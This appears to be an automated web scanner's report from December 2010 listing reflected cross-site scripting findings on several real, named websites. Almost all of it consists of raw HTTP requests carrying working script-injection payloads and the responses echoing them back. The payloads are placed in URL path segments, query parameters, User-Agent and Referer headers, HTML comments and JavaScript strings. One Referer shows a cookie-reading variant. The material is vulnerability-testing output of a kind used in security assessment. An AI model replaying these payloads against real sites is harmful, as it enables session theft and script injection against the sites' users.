<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng"> <head> <met ...[SNIP]... <strong>Page not found - /resources/blogs/email_marketing_insights3d67d<script>alert(1)</script>2aa12a5bf2f/<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 --> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f0d24<script>alert(1)</script>cd7b810945d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/blogs/jsf0d24<script>alert(1)</script>cd7b810945d/app.js HTTP/1.1 Host: www.strongmail.com Proxy-Connection: keep-alive Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not found Date: Thu, 16 Dec 2010 14:17:47 GMT Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Content-Type: text/html; charset=utf-8 Content-Length: 10600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng"> <head> <met ...[SNIP]... <strong>Page not found - /resources/blogs/jsf0d24<script>alert(1)</script>cd7b810945d/app.js<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 --> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 72f1c<script>alert(1)</script>431883dd8be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/blogs/js/app.js72f1c<script>alert(1)</script>431883dd8be HTTP/1.1 Host: www.strongmail.com Proxy-Connection: keep-alive Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not found Date: Thu, 16 Dec 2010 14:17:52 GMT Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Content-Type: text/html; charset=utf-8 Content-Length: 10600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng"> <head> <met ...[SNIP]... <strong>Page not found - /resources/blogs/js/app.js72f1c<script>alert(1)</script>431883dd8be<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 --> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4953e<script>alert(1)</script>d037fb92e58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/blogs/js4953e<script>alert(1)</script>d037fb92e58/cufon.js HTTP/1.1 Host: www.strongmail.com Proxy-Connection: keep-alive Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not found Date: Thu, 16 Dec 2010 14:17:50 GMT Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Content-Type: text/html; charset=utf-8 Content-Length: 10602
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng"> <head> <met ...[SNIP]... <strong>Page not found - /resources/blogs/js4953e<script>alert(1)</script>d037fb92e58/cufon.js<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 --> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a2064<script>alert(1)</script>0eaf6ce554a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/blogs/js/cufon.jsa2064<script>alert(1)</script>0eaf6ce554a HTTP/1.1 Host: www.strongmail.com Proxy-Connection: keep-alive Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not found Date: Thu, 16 Dec 2010 14:17:56 GMT Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Content-Type: text/html; charset=utf-8 Content-Length: 10602
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng"> <head> <met ...[SNIP]... <strong>Page not found - /resources/blogs/js/cufon.jsa2064<script>alert(1)</script>0eaf6ce554a<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 --> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fa2d6<script>alert(1)</script>b930b750297 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/blogs/jsfa2d6<script>alert(1)</script>b930b750297/jquery-1.2.6.min.js HTTP/1.1 Host: www.strongmail.com Proxy-Connection: keep-alive Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not found Date: Thu, 16 Dec 2010 14:17:50 GMT Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Content-Type: text/html; charset=utf-8 Content-Length: 10613
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng"> <head> <met ...[SNIP]... <strong>Page not found - /resources/blogs/jsfa2d6<script>alert(1)</script>b930b750297/jquery-1.2.6.min.js<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 --> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 15f03<script>alert(1)</script>9c399824315 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resources/blogs/js/jquery-1.2.6.min.js15f03<script>alert(1)</script>9c399824315 HTTP/1.1 Host: www.strongmail.com Proxy-Connection: keep-alive Referer: http://www.strongmail.com/resources/blogs/email_marketing_insights3d67d%3Cscript%3Ealert(documnet.cookie)%3C/script%3E2aa12a5bf2f/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not found Date: Thu, 16 Dec 2010 14:17:57 GMT Server: Apache/2.2.3 (Debian) DAV/2 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8 X-Powered-By: PHP/5.2.0-8+etch15 Content-Type: text/html; charset=utf-8 Content-Length: 10613
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="eng"> <head> <met ...[SNIP]... <strong>Page not found - /resources/blogs/js/jquery-1.2.6.min.js15f03<script>alert(1)</script>9c399824315<!-- file: /data1/web/cgi-bin/mt/php/lib/MTViewer.php; line: 145; code: 256 --> ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259e7"style%3d"x%3aexpression(alert(1))"b1f1939da85 was submitted in the url parameter. This input was echoed as 259e7"style="x:expression(alert(1))"b1f1939da85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /submit?title=${video.headline}&url=http://cnn.com/video/data/2.0/video/${video.id}.html259e7"style%3d"x%3aexpression(alert(1))"b1f1939da85 HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the autofollowed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4aaa7%3balert(1)//63b47141f3f was submitted in the autofollowed parameter. This input was echoed as 4aaa7;alert(1)//63b47141f3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /services/toolbar?blog_id=6a00d8341c51c053ef00d83451b2b369e2&asset_id=&atype=index&to=http%3A%2F%2Fadweek.blogs.com%2Fadfreak%2F&autofollowed=04aaa7%3balert(1)//63b47141f3f HTTP/1.1 Host: www.typepad.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 16 Dec 2010 13:15:58 GMT Server: Apache X-Webserver: oak-tp-app005 Cache-Control: private Pragma: no-cache Vary: cookie,negotiate,accept-language Content-Language: en Content-Length: 14867 Content-Type: text/html; charset=utf-8
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b8a1d<script>alert(1)</script>cb83c424205 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /webapp/download/byproduct.jspb8a1d<script>alert(1)</script>cb83c424205 HTTP/1.1 Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 16 Dec 2010 14:02:19 GMT Server: IBM_HTTP_Server $WSEP: Surrogate-Control: no-store Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Content-Length: 9570 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000HT7uHsDgcaOg2VvRG_MmycI:-1; Path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang= ...[SNIP]... </strong> /byproduct.jspb8a1d<script>alert(1)</script>cb83c424205 </p> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload b1b9c<script>alert(1)</script>229fe47e250 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.adotas.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10b1b9c<script>alert(1)</script>229fe47e250 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:17:06 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Cache-Control: max-age=7200 Expires: Thu, 16 Dec 2010 15:17:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 77866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<meta http-equiv="Content- ...[SNIP]... order: 1px solid #ff0000; } a.ViewResult{position:relative;left:105px;top:-3px;}/*Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10b1b9c<script>alert(1)</script>229fe47e250*/ .wp-polls-loading { display:none; } </style> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload af389<script>alert(1)</script>ba953b11062 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /2010/12/doubleverify-to-deliver-forward-is-with-verification/ HTTP/1.1 Host: www.adotas.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10af389<script>alert(1)</script>ba953b11062 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=47048311.1018667347.1292504930.1292504930.1292504930.1; __utmb=47048311; __utmc=47048311; __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:22:49 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Cache-Control: max-age=7200 Expires: Thu, 16 Dec 2010 15:22:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 71728
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... order: 1px solid #ff0000; } a.ViewResult{position:relative;left:105px;top:-3px;}/*Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10af389<script>alert(1)</script>ba953b11062*/ .wp-polls-loading { display:none; } </style> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload cbba9<script>alert(1)</script>0ce811d4761 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /about/ HTTP/1.1 Host: www.adotas.com Proxy-Connection: keep-alive Referer: http://research.adotas.com/?option=com_categoryreport&task=viewabstract&pathway=no&autodn=1&title=11093&crv=9679&src=12&tgt=127&cmp=2748&yld=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10cbba9<script>alert(1)</script>0ce811d4761 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmc=47048311; __utmz=47048311.1292504930.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=47048311; __utma=47048311.1018667347.1292504930.1292504930.1292504930.1
Response (redirected)
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 13:22:04 GMT Server: Apache X-Powered-By: PHP/5.2.10 X-Pingback: http://www.adotas.com/wp/xmlrpc.php Cache-Control: max-age=7200 Expires: Thu, 16 Dec 2010 15:22:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 62279
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="refresh ...[SNIP]... order: 1px solid #ff0000; } a.ViewResult{position:relative;left:105px;top:-3px;}/*Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10cbba9<script>alert(1)</script>0ce811d4761*/ .wp-polls-loading { display:none; } </style> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload d3b00--><script>alert(1)</script>78152596edd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us HTTP/1.1 Host: www.infoprint.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=d3b00--><script>alert(1)</script>78152596edd Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Lotus-Domino Date: Thu, 16 Dec 2010 14:05:57 GMT Last-Modified: Thu, 16 Dec 2010 14:05:55 GMT Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=ISO-8859-1 Content-Length: 33597 Cache-control: no-cache
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript"> <!-- var currentURL = location.href; if (currentURL ...[SNIP]... <!--HTTP_REFERER: http://www.google.com/search?hl=en&q=d3b00--><script>alert(1)</script>78152596edd--> ...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 833fc--><script>alert(1)</script>9a461e7a837 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /precisionmarketing HTTP/1.1 Host: www.infoprint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=833fc--><script>alert(1)</script>9a461e7a837
Response
HTTP/1.1 200 OK Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:31:46 GMT Connection: close Last-Modified: Thu, 16 Dec 2010 13:31:44 GMT Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=ISO-8859-1 Content-Length: 33597 Cache-control: no-cache
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript"> <!-- var currentURL = location.href; if (currentURL ...[SNIP]... <!--HTTP_REFERER: http://www.google.com/search?hl=en&q=833fc--><script>alert(1)</script>9a461e7a837--> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload b716f<script>alert(1)</script>efabde2fa8e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news/career-advice-running-projects-across-time-zones/142135 HTTP/1.1 Host: www.itworldcanada.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=b716f<script>alert(1)</script>efabde2fa8e
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 376ff"><script>alert(1)</script>f76fe3c76af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /news/career-advice-running-projects-across-time-zones/142135 HTTP/1.1 Host: www.itworldcanada.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=376ff"><script>alert(1)</script>f76fe3c76af
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e35db'-alert(1)-'8d2e281dc39 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.linuxworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e35db'-alert(1)-'8d2e281dc39
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd17a'-alert(1)-'7a4e41c4cba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.networkworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bd17a'-alert(1)-'7a4e41c4cba
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) nnCoection: close Content-Type: text/html; charset=UTF-8 Expires: Thu, 16 Dec 2010 13:36:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 16 Dec 2010 13:36:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: Apache=174.121.222.18.1292506614444997; path=/; expires=Sat, 15-Dec-12 13:36:54 GMT Content-Length: 214703
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c55f"><script>alert(1)</script>fff2cce0c0e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p-25K88fxDSEn9Y HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5c55f"><script>alert(1)</script>fff2cce0c0e
Response
